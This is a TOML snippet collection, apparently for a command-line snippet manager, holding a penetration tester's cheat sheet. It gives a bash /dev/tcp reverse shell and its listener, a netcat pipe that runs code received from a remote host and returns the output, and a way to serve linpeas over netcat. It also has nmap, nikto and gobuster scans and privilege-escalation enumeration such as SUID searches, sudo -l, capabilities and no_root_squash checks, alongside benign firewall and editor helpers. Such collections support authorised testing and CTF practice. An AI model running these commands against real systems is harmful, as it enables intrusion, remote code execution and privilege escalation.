[[snippets]]
  description = "serv"
  command = "python3 -m http.server <port=8888>"
  output = ""

[[snippets]]
  description = "Upload linpeas with nc"
  command = "cat /usr/share/peass/linPEAS/linpeas.sh | nc -lvnp <port=8888> & nc -lvnp <port=9999> | tee linpeas_report_$(date +%Y%m%d%H%M%S).txt & wait"
  output = ""

[[snippets]]
  description = "Execute from memory and send output back to the host"
  command = "nc <ip:> <port=8888> | sh 2>&1 | nc <ip:> <port=9999>"
  output = ""

[[snippets]]
  description = "linux-exploit-suggester-2.pl"
  command = "wget 'https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl' -O linux-exploit-suggester-2.pl && chmod +x linux-exploit-suggester-2.pl"
  output = ""

[[snippets]]
  description = "vim"
  command = "vim -p -c 'set ignorecase smartcase wildignorecase tabstop=2 softtabstop=2 shiftwidth=2 expandtab paste' "
  output = ""

[[snippets]]
  description = "add padding to avoid invalid input for base64"
  command = " | fold -w 4 | sed '$ d' | tr -d '\\n'"
  output = ""

[[snippets]]
  description = "allow incoming traffic"
  command = "sh -c '( set -x; sudo ufw allow from <ip:> proto tcp to any port <port=8888,9999> && sudo ufw status verbose )'"
  tag = ["firewall"]
  output = ""

[[snippets]]
  description = "delete incoming traffic rule"
  command = "sh -c '( set -x; sudo ufw delete allow from <ip:> proto tcp to any port <port=8888,9999> && sudo ufw status verbose )'"
  tag = ["firewall"]
  output = ""

[[snippets]]
  description = "reset and restart ufw"
  command = "sh -c '( set -x; sudo ufw --force reset && sudo ufw enable && sudo ufw status verbose )'"
  tag = ["firewall"]
  output = ""

[[snippets]]
  description = "netcat reverse shell remote"
  command = "bash -i >&/dev/tcp/<ip:>/<port=8888> 0>&1"
  output = ""

[[snippets]]
  description = "netcat reverse shell local"
  command = "tmux send-keys 'bash -l' Enter 'nc -lvnp <port=8888>' Enter"
  output = ""

[[snippets]]
  description = "stabilize shell using python"
  command = "python -c 'import pty;pty.spawn(\"/bin/bash\")'"
  output = ""

[[snippets]]
  description = "stabilize shell using stty and $TERM"
  command = "tmux send-keys 'stty raw -echo; fg' Enter 'export TERM=xterm' Enter"
  output = ""

[[snippets]]
  description = "fast port scan"
  command = "nmap -F -sV -Pn -oN nmap_report_$(date +%Y%m%d%H%M%S).txt <ip:>"
  output = ""

[[snippets]]
  description = "full port scan"
  command = "nmap -sV -sC -oN nmap_report_$(date +%Y%m%d%H%M%S).txt <ip:>"
  output = ""

[[snippets]]
  description = "scan vulnerabilities"
  command = "nikto -port <port:> -h <ip:> | tee nikto_report_$(date +%Y%m%d%H%M%S).txt"
  output = ""

[[snippets]]
  description = "file enumeration"
  command = "gobuster dir -u <url:> -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 64 -x html,php,sh,js,css | tee gobuster_report_$(date +%Y%m%d%H%M%S).txt"
  output = ""

[[snippets]]
  description = "dir enumeration"
  command = "gobuster dir -u <url:> -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 64 | tee gobuster_report_$(date +%Y%m%d%H%M%S).txt"
  output = ""

[[snippets]]
  description = "vhost enumeration"
  command = "gobuster vhost -u <url:> -w /usr/share/wordlists/discovery/subdomains-top1million-5000.txt -t 64 | tee gobuster_report_$(date +%Y%m%d%H%M%S).txt"
  output = ""

[[snippets]]
  description = "find SUID Binaries"
  command = "find / -type f -perm -04000 -ls 2>/dev/null"
  output = ""

[[snippets]]
  description = "show passwd"
  command = "cat /etc/passwd"
  output = ""

[[snippets]]
  description = "show system info"
  command = "sh -c '( set -x; uname -a; cat /etc/os-release )'"
  output = ""

[[snippets]]
  description = "list the privileges for the invoking user"
  command = "sudo -l"
  output = ""

[[snippets]]
  description = "show crontab"
  command = "cat /etc/crontab"
  output = ""

[[snippets]]
  description = "list enabled capabilities"
  command = "getcap -r / 2>/dev/null"
  output = ""

[[snippets]]
  description = "show no_root_squash"
  command = "grep no_root_squash /etc/exports"
  output = ""

[[snippets]]
  description = "edit hosts"
  command = "sh -c '[ -z \"$EDITOR\" ] && export EDITOR=$(type vim >/dev/null 2>&1 && echo vim || echo vi); [ $(id -u) = 0 ] && $EDITOR /etc/hosts || sudoedit /etc/hosts'"
  output = ""

[[snippets]]
  description = "generate random string"
  command = "tr -dc A-Za-z0-9 </dev/urandom | head -c 20; echo ''"
  output = ""

[[snippets]]
  description = "set $EDITOR"
  command = "export EDITOR=$(type vim >/dev/null 2>&1 && echo vim || echo vi)"
  output = ""
